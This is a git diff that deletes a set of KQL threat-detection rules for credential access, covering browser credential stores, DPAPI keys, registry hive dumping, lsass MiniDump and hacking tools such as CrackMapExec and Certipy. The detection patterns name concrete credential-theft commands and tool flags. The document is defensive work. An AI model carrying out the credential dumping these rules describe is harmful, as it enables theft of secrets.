@@ -// Author: frack113 -// Date: 2022/04/09 -// Level: medium -// Description: Detects file access requests to browser credential stores by uncommon processes. -Could indicate potential attempt of credential stealing. -Requires heavy baselining before usage - -// Tags: attack.t1003, attack.credential_access -DeviceFileEvents -| where ((FileName contains "\\Appdata\\Local\\Chrome\\User Data\\Default\\Login Data" or FileName contains "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" or FileName contains "\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") or (FileName endswith "\\cookies.sqlite" or FileName endswith "release\\key3.db" or FileName endswith "release\\key4.db" or FileName endswith "release\\logins.json") or FileName endswith "\\Appdata\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat") and (not(((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\" and (InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe")) or (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe")))) \ No newline at end of file diff --git a/Credential Access/Access_To_Potentially_Sensitive_Sysvol_Files_By_Uncommon_Application.kql b/Credential Access/Access_To_Potentially_Sensitive_Sysvol_Files_By_Uncommon_Application.kql deleted file mode 100644 index a9c88609..00000000 --- a/Credential Access/Access_To_Potentially_Sensitive_Sysvol_Files_By_Uncommon_Application.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2023/12/21 -// Level: medium -// Description: Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share. -// Tags: attack.credential_access, attack.t1552.006 -DeviceFileEvents -| where ((FileName contains "\\sysvol\\" and FileName contains "\\Policies\\") and (FileName endswith "audit.csv" or FileName endswith "Files.xml" or FileName endswith "GptTmpl.inf" or FileName endswith "groups.xml" or FileName endswith "Registry.pol" or FileName endswith "Registry.xml" or FileName endswith "scheduledtasks.xml" or FileName endswith "scripts.ini" or FileName endswith "services.xml") and FileName startswith "\\") and (not((InitiatingProcessFolderPath startswith ":\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith ":\\Program Files\\" or InitiatingProcessFolderPath startswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath startswith ":\\Windows\\system32\\" or InitiatingProcessFolderPath startswith ":\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/Credential Access/Access_To_Windows_Credential_History_File_By_Uncommon_Application.kql b/Credential Access/Access_To_Windows_Credential_History_File_By_Uncommon_Application.kql deleted file mode 100644 index 89cda722..00000000 --- a/Credential Access/Access_To_Windows_Credential_History_File_By_Uncommon_Application.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/17 -// Level: medium -// Description: Detects file access requests to the Windows Credential History File by an uncommon application. -This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function - -// Tags: attack.credential_access, attack.t1555.004 -DeviceFileEvents -| where FileName endswith "\\Microsoft\\Protect\\CREDHIST" and (not((InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or (InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\")))) \ No newline at end of file diff --git a/Credential Access/Access_To_Windows_DPAPI_Master_Keys_By_Uncommon_Application.kql b/Credential Access/Access_To_Windows_DPAPI_Master_Keys_By_Uncommon_Application.kql deleted file mode 100644 index 58097097..00000000 --- a/Credential Access/Access_To_Windows_DPAPI_Master_Keys_By_Uncommon_Application.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/17 -// Level: medium -// Description: Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. -This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function - -// Tags: attack.credential_access, attack.t1555.004 -DeviceFileEvents -| where (FileName contains "\\Microsoft\\Protect\\S-1-5-18\\" or FileName contains "\\Microsoft\\Protect\\S-1-5-21-") and (not((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/Credential Access/Active_Directory_Database_Snapshot_Via_ADExplorer.kql b/Credential Access/Active_Directory_Database_Snapshot_Via_ADExplorer.kql deleted file mode 100644 index 35b910af..00000000 --- a/Credential Access/Active_Directory_Database_Snapshot_Via_ADExplorer.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/14 -// Level: medium -// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. -// Tags: attack.credential_access, attack.t1552.001, attack.t1003.003 -DeviceProcessEvents -| where ProcessCommandLine contains "snapshot" and (FolderPath endswith "\\ADExplorer.exe" or ProcessVersionInfoOriginalFileName =~ "AdExp") \ No newline at end of file diff --git a/Credential Access/Automated_Collection_Command_Prompt.kql b/Credential Access/Automated_Collection_Command_Prompt.kql deleted file mode 100644 index 9f680167..00000000 --- a/Credential Access/Automated_Collection_Command_Prompt.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/28 -// Level: medium -// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. -// Tags: attack.collection, attack.t1119, attack.credential_access, attack.t1552.001 -DeviceProcessEvents -| where (ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".docx" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xlsx" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".pptx" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".txt") and ((ProcessCommandLine contains "dir " and ProcessCommandLine contains " /b " and ProcessCommandLine contains " /s ") or ((ProcessCommandLine contains " /e " or ProcessCommandLine contains " /si ") and ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE")) \ No newline at end of file diff --git a/Credential Access/Browser_Started_with_Remote_Debugging.kql b/Credential Access/Browser_Started_with_Remote_Debugging.kql deleted file mode 100644 index a1e712fd..00000000 --- a/Credential Access/Browser_Started_with_Remote_Debugging.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/27 -// Level: medium -// Description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks -// Tags: attack.credential_access, attack.t1185 -DeviceProcessEvents -| where ProcessCommandLine contains " --remote-debugging-" or (ProcessCommandLine contains " -start-debugger-server" and FolderPath endswith "\\firefox.exe") \ No newline at end of file diff --git a/Credential Access/Capture_Credentials_with_Rpcping.exe.kql b/Credential Access/Capture_Credentials_with_Rpcping.exe.kql deleted file mode 100644 index a795212c..00000000 --- a/Credential Access/Capture_Credentials_with_Rpcping.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Julia Fomina, oscd.community -// Date: 2020/10/09 -// Level: medium -// Description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. -// Tags: attack.credential_access, attack.t1003 -DeviceProcessEvents -| where FolderPath endswith "\\rpcping.exe" and (ProcessCommandLine contains "-s" or ProcessCommandLine contains "/s") and (((ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u") and (ProcessCommandLine contains "NTLM")) or ((ProcessCommandLine contains "-t" or ProcessCommandLine contains "/t") and (ProcessCommandLine contains "ncacn_np"))) \ No newline at end of file diff --git a/Credential Access/Certificate_Exported_Via_PowerShell.kql b/Credential Access/Certificate_Exported_Via_PowerShell.kql deleted file mode 100644 index 3d1a911f..00000000 --- a/Credential Access/Certificate_Exported_Via_PowerShell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/18 -// Level: medium -// Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. -// Tags: attack.credential_access, attack.execution, attack.t1552.004, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "Export-PfxCertificate " or ProcessCommandLine contains "Export-Certificate " \ No newline at end of file diff --git a/Credential Access/Copying_Sensitive_Files_with_Credential_Data.kql b/Credential Access/Copying_Sensitive_Files_with_Credential_Data.kql deleted file mode 100644 index 7128b3f4..00000000 --- a/Credential Access/Copying_Sensitive_Files_with_Credential_Data.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community -// Date: 2019/10/22 -// Level: high -// Description: Files with well-known filenames (sensitive files with credential data) copying -// Tags: attack.credential_access, attack.t1003.002, attack.t1003.003, car.2013-07-001, attack.s0404 -DeviceProcessEvents -| where ((ProcessCommandLine contains "vss" or ProcessCommandLine contains " /m " or ProcessCommandLine contains " /y ") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "\\esentutl.exe")) or (ProcessCommandLine contains "\\windows\\ntds\\ntds.dit" or ProcessCommandLine contains "\\config\\sam" or ProcessCommandLine contains "\\config\\security" or ProcessCommandLine contains "\\config\\system " or ProcessCommandLine contains "\\repair\\sam" or ProcessCommandLine contains "\\repair\\system" or ProcessCommandLine contains "\\repair\\security" or ProcessCommandLine contains "\\config\\RegBack\\sam" or ProcessCommandLine contains "\\config\\RegBack\\system" or ProcessCommandLine contains "\\config\\RegBack\\security") \ No newline at end of file diff --git a/Credential Access/CrackMapExec_File_Indicators.kql b/Credential Access/CrackMapExec_File_Indicators.kql deleted file mode 100644 index a26d915b..00000000 --- a/Credential Access/CrackMapExec_File_Indicators.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/03/11 -// Level: high -// Description: Detects file creation events with filename patterns used by CrackMapExec. -// Tags: attack.credential_access, attack.t1003.001 -DeviceFileEvents -| where FolderPath startswith "C:\\Windows\\Temp\\" and ((FolderPath matches regex "\\\\[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\.txt$" or FolderPath matches regex "\\\\[a-zA-Z]{8}\\.tmp$") or (FolderPath endswith "\\temp.ps1" or FolderPath endswith "\\msol.ps1")) \ No newline at end of file diff --git a/Credential Access/CredUI.DLL_Loaded_By_Uncommon_Process.kql b/Credential Access/CredUI.DLL_Loaded_By_Uncommon_Process.kql deleted file mode 100644 index 0fb4879a..00000000 --- a/Credential Access/CredUI.DLL_Loaded_By_Uncommon_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/20 -// Level: medium -// Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW". -// Tags: attack.credential_access, attack.collection, attack.t1056.002 -DeviceImageLoadEvents -| where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/Credential Access/Cred_Dump_Tools_Dropped_Files.kql b/Credential Access/Cred_Dump_Tools_Dropped_Files.kql deleted file mode 100644 index 7914875e..00000000 --- a/Credential Access/Cred_Dump_Tools_Dropped_Files.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov, oscd.community -// Date: 2019/11/01 -// Level: high -// Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation -// Tags: attack.credential_access, attack.t1003.001, attack.t1003.002, attack.t1003.003, attack.t1003.004, attack.t1003.005 -DeviceFileEvents -| where (FolderPath contains "\\fgdump-log" or FolderPath contains "\\kirbi" or FolderPath contains "\\pwdump" or FolderPath contains "\\pwhashes" or FolderPath contains "\\wce_ccache" or FolderPath contains "\\wce_krbtkts") or (FolderPath endswith "\\cachedump.exe" or FolderPath endswith "\\cachedump64.exe" or FolderPath endswith "\\DumpExt.dll" or FolderPath endswith "\\DumpSvc.exe" or FolderPath endswith "\\Dumpy.exe" or FolderPath endswith "\\fgexec.exe" or FolderPath endswith "\\lsremora.dll" or FolderPath endswith "\\lsremora64.dll" or FolderPath endswith "\\NTDS.out" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\pstgdump.exe" or FolderPath endswith "\\pwdump.exe" or FolderPath endswith "\\SAM.out" or FolderPath endswith "\\SECURITY.out" or FolderPath endswith "\\servpw.exe" or FolderPath endswith "\\servpw64.exe" or FolderPath endswith "\\SYSTEM.out" or FolderPath endswith "\\test.pwd" or FolderPath endswith "\\wceaux.dll") \ No newline at end of file diff --git a/Credential Access/Credential_Manager_Access_By_Uncommon_Application.kql b/Credential Access/Credential_Manager_Access_By_Uncommon_Application.kql deleted file mode 100644 index 3451a855..00000000 --- a/Credential Access/Credential_Manager_Access_By_Uncommon_Application.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/11 -// Level: medium -// Description: Detects suspicious processes based on name and location that access the windows credential manager and vault. -Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function - -// Tags: attack.t1003, attack.credential_access -DeviceFileEvents -| where (FileName contains "\\AppData\\Local\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Roaming\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Local\\Microsoft\\Vault\\" or FileName contains "\\ProgramData\\Microsoft\\Vault\\") and (not((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/Credential Access/Dropping_Of_Password_Filter_DLL.kql b/Credential Access/Dropping_Of_Password_Filter_DLL.kql deleted file mode 100644 index 2ced395a..00000000 --- a/Credential Access/Dropping_Of_Password_Filter_DLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sreeman -// Date: 2020/10/29 -// Level: medium -// Description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS -// Tags: attack.credential_access, attack.t1556.002 -DeviceProcessEvents -| where ProcessCommandLine contains "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "scecli\\0" and ProcessCommandLine contains "reg add" \ No newline at end of file diff --git a/Credential Access/Dumping_Process_via_Sqldumper.exe.kql b/Credential Access/Dumping_Process_via_Sqldumper.exe.kql deleted file mode 100644 index ec50686d..00000000 --- a/Credential Access/Dumping_Process_via_Sqldumper.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Kirill Kiryanov, oscd.community -// Date: 2020/10/08 -// Level: medium -// Description: Detects process dump via legitimate sqldumper.exe binary -// Tags: attack.credential_access, attack.t1003.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "0x0110" or ProcessCommandLine contains "0x01100:40") and FolderPath endswith "\\sqldumper.exe" \ No newline at end of file diff --git a/Credential Access/Dumping_of_Sensitive_Hives_Via_Reg.EXE.kql b/Credential Access/Dumping_of_Sensitive_Hives_Via_Reg.EXE.kql deleted file mode 100644 index 473cc6b9..00000000 --- a/Credential Access/Dumping_of_Sensitive_Hives_Via_Reg.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113 -// Date: 2019/10/22 -// Level: high -// Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives. -// Tags: attack.credential_access, attack.t1003.002, attack.t1003.004, attack.t1003.005, car.2013-07-001 -DeviceProcessEvents -| where (ProcessCommandLine contains " save " or ProcessCommandLine contains " export " or ProcessCommandLine contains " ˢave " or ProcessCommandLine contains " eˣport ") and (ProcessCommandLine contains "\\system" or ProcessCommandLine contains "\\sam" or ProcessCommandLine contains "\\security" or ProcessCommandLine contains "\\ˢystem" or ProcessCommandLine contains "\\syˢtem" or ProcessCommandLine contains "\\ˢyˢtem" or ProcessCommandLine contains "\\ˢam" or ProcessCommandLine contains "\\ˢecurity") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hk˪m" or ProcessCommandLine contains "hkey_local_machine" or ProcessCommandLine contains "hkey_˪ocal_machine" or ProcessCommandLine contains "hkey_loca˪_machine" or ProcessCommandLine contains "hkey_˪oca˪_machine") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/Credential Access/Enumeration_for_3rd_Party_Creds_From_CLI.kql b/Credential Access/Enumeration_for_3rd_Party_Creds_From_CLI.kql deleted file mode 100644 index 8512a497..00000000 --- a/Credential Access/Enumeration_for_3rd_Party_Creds_From_CLI.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/20 -// Level: medium -// Description: Detects processes that query known 3rd party registry keys that holds credentials via commandline -// Tags: attack.credential_access, attack.t1552.002 -DeviceProcessEvents -| where ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\Sessions" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\" or ProcessCommandLine contains "\\Software\\Mobatek\\MobaXterm\\" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin" or ProcessCommandLine contains "\\Software\\Aerofox\\FoxmailPreview" or ProcessCommandLine contains "\\Software\\Aerofox\\Foxmail\\V3.1" or ProcessCommandLine contains "\\Software\\IncrediMail\\Identities" or ProcessCommandLine contains "\\Software\\Qualcomm\\Eudora\\CommandLine" or ProcessCommandLine contains "\\Software\\RimArts\\B2\\Settings" or ProcessCommandLine contains "\\Software\\OpenVPN-GUI\\configs" or ProcessCommandLine contains "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions" or ProcessCommandLine contains "\\Software\\FTPWare\\COREFTP\\Sites" or ProcessCommandLine contains "\\Software\\DownloadManager\\Passwords" or ProcessCommandLine contains "\\Software\\OpenSSH\\Agent\\Keys" or ProcessCommandLine contains "\\Software\\TightVNC\\Server" or ProcessCommandLine contains "\\Software\\ORL\\WinVNC3\\Password" or ProcessCommandLine contains "\\Software\\RealVNC\\WinVNC4" \ No newline at end of file diff --git a/Credential Access/Enumeration_for_Credentials_in_Registry.kql b/Credential Access/Enumeration_for_Credentials_in_Registry.kql deleted file mode 100644 index 1ba1bafc..00000000 --- a/Credential Access/Enumeration_for_Credentials_in_Registry.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2021/12/20 -// Level: medium -// Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials. -The Windows Registry stores configuration information that can be used by the system or other programs. -Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services - -// Tags: attack.credential_access, attack.t1552.002 -DeviceProcessEvents -| where ((ProcessCommandLine contains " query " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_SZ" and ProcessCommandLine contains "/s") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKLM") or (ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKCU") or ProcessCommandLine contains "HKCU\\Software\\SimonTatham\\PuTTY\\Sessions") \ No newline at end of file diff --git a/Credential Access/Esentutl_Gather_Credentials.kql b/Credential Access/Esentutl_Gather_Credentials.kql deleted file mode 100644 index 737a9cd8..00000000 --- a/Credential Access/Esentutl_Gather_Credentials.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: sam0x90 -// Date: 2021/08/06 -// Level: medium -// Description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. -// Tags: attack.credential_access, attack.t1003, attack.t1003.003 -DeviceProcessEvents -| where ProcessCommandLine contains "esentutl" and ProcessCommandLine contains " /p" \ No newline at end of file diff --git a/Credential Access/Esentutl_Volume_Shadow_Copy_Service_Keys.kql b/Credential Access/Esentutl_Volume_Shadow_Copy_Service_Keys.kql deleted file mode 100644 index 7ff25f25..00000000 --- a/Credential Access/Esentutl_Volume_Shadow_Copy_Service_Keys.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/20 -// Level: high -// Description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. -// Tags: attack.credential_access, attack.t1003.002 -DeviceRegistryEvents -| where (InitiatingProcessFolderPath endswith "esentutl.exe" and RegistryKey contains "System\\CurrentControlSet\\Services\\VSS") and (not(RegistryKey contains "System\\CurrentControlSet\\Services\\VSS\\Start")) \ No newline at end of file diff --git a/Credential Access/Findstr_GPP_Passwords.kql b/Credential Access/Findstr_GPP_Passwords.kql deleted file mode 100644 index 2edc5195..00000000 --- a/Credential Access/Findstr_GPP_Passwords.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/27 -// Level: high -// Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt. -// Tags: attack.credential_access, attack.t1552.006 -DeviceProcessEvents -| where (ProcessCommandLine contains "cpassword" and ProcessCommandLine contains "\\sysvol\\" and ProcessCommandLine contains ".xml") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE"))) \ No newline at end of file diff --git a/Credential Access/HackTool_-_ADCSPwn_Execution.kql b/Credential Access/HackTool_-_ADCSPwn_Execution.kql deleted file mode 100644 index 36f7298a..00000000 --- a/Credential Access/HackTool_-_ADCSPwn_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/07/31 -// Level: high -// Description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service -// Tags: attack.credential_access, attack.t1557.001 -DeviceProcessEvents -| where ProcessCommandLine contains " --adcs " and ProcessCommandLine contains " --port " \ No newline at end of file diff --git a/Credential Access/HackTool_-_Certify_Execution.kql b/Credential Access/HackTool_-_Certify_Execution.kql deleted file mode 100644 index 1f56d25c..00000000 --- a/Credential Access/HackTool_-_Certify_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems) -// Date: 2023/04/17 -// Level: high -// Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments. -// Tags: attack.discovery, attack.credential_access, attack.t1649 -DeviceProcessEvents -| where (FolderPath endswith "\\Certify.exe" or ProcessVersionInfoOriginalFileName =~ "Certify.exe" or ProcessVersionInfoFileDescription contains "Certify") or ((ProcessCommandLine contains ".exe cas " or ProcessCommandLine contains ".exe find " or ProcessCommandLine contains ".exe pkiobjects " or ProcessCommandLine contains ".exe request " or ProcessCommandLine contains ".exe download ") and (ProcessCommandLine contains " /vulnerable" or ProcessCommandLine contains " /template:" or ProcessCommandLine contains " /altname:" or ProcessCommandLine contains " /domain:" or ProcessCommandLine contains " /path:" or ProcessCommandLine contains " /ca:")) \ No newline at end of file diff --git a/Credential Access/HackTool_-_Certipy_Execution.kql b/Credential Access/HackTool_-_Certipy_Execution.kql deleted file mode 100644 index 39f45158..00000000 --- a/Credential Access/HackTool_-_Certipy_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems) -// Date: 2023/04/17 -// Level: high -// Description: Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments. -// Tags: attack.discovery, attack.credential_access, attack.t1649 -DeviceProcessEvents -| where (FolderPath endswith "\\Certipy.exe" or ProcessVersionInfoOriginalFileName =~ "Certipy.exe" or ProcessVersionInfoFileDescription contains "Certipy") or ((ProcessCommandLine contains " auth " or ProcessCommandLine contains " find " or ProcessCommandLine contains " forge " or ProcessCommandLine contains " relay " or ProcessCommandLine contains " req " or ProcessCommandLine contains " shadow ") and (ProcessCommandLine contains " -bloodhound" or ProcessCommandLine contains " -ca-pfx " or ProcessCommandLine contains " -dc-ip " or ProcessCommandLine contains " -kirbi" or ProcessCommandLine contains " -old-bloodhound" or ProcessCommandLine contains " -pfx " or ProcessCommandLine contains " -target" or ProcessCommandLine contains " -username " or ProcessCommandLine contains " -vulnerable" or ProcessCommandLine contains "auth -pfx" or ProcessCommandLine contains "shadow auto" or ProcessCommandLine contains "shadow list")) \ No newline at end of file diff --git a/Credential Access/HackTool_-_CrackMapExec_Execution.kql b/Credential Access/HackTool_-_CrackMapExec_Execution.kql deleted file mode 100644 index 2272759d..00000000 --- a/Credential Access/HackTool_-_CrackMapExec_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/25 -// Level: high -// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced. -// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201 -DeviceProcessEvents -| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 ")) \ No newline at end of file diff --git a/Credential Access/HackTool_-_CrackMapExec_Process_Patterns.kql b/Credential Access/HackTool_-_CrackMapExec_Process_Patterns.kql deleted file mode 100644 index 8b3ce06f..00000000 --- a/Credential Access/HackTool_-_CrackMapExec_Process_Patterns.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/12 -// Level: high -// Description: Detects suspicious process patterns found in logs when CrackMapExec is used -// Tags: attack.credential_access, attack.t1003.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k ") and (ProcessCommandLine contains "tasklist /fi " and ProcessCommandLine contains "Imagename eq lsass.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) or (ProcessCommandLine contains "do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump" and ProcessCommandLine contains "\\Windows\\Temp\\" and ProcessCommandLine contains " full" and ProcessCommandLine contains "%%B") or (ProcessCommandLine contains "tasklist /v /fo csv" and ProcessCommandLine contains "findstr /i \"lsass\"") \ No newline at end of file diff --git a/Credential Access/HackTool_-_Dumpert_Process_Dumper_Default_File.kql b/Credential Access/HackTool_-_Dumpert_Process_Dumper_Default_File.kql deleted file mode 100644 index 666d65b4..00000000 --- a/Credential Access/HackTool_-_Dumpert_Process_Dumper_Default_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2020/02/04 -// Level: critical -// Description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the 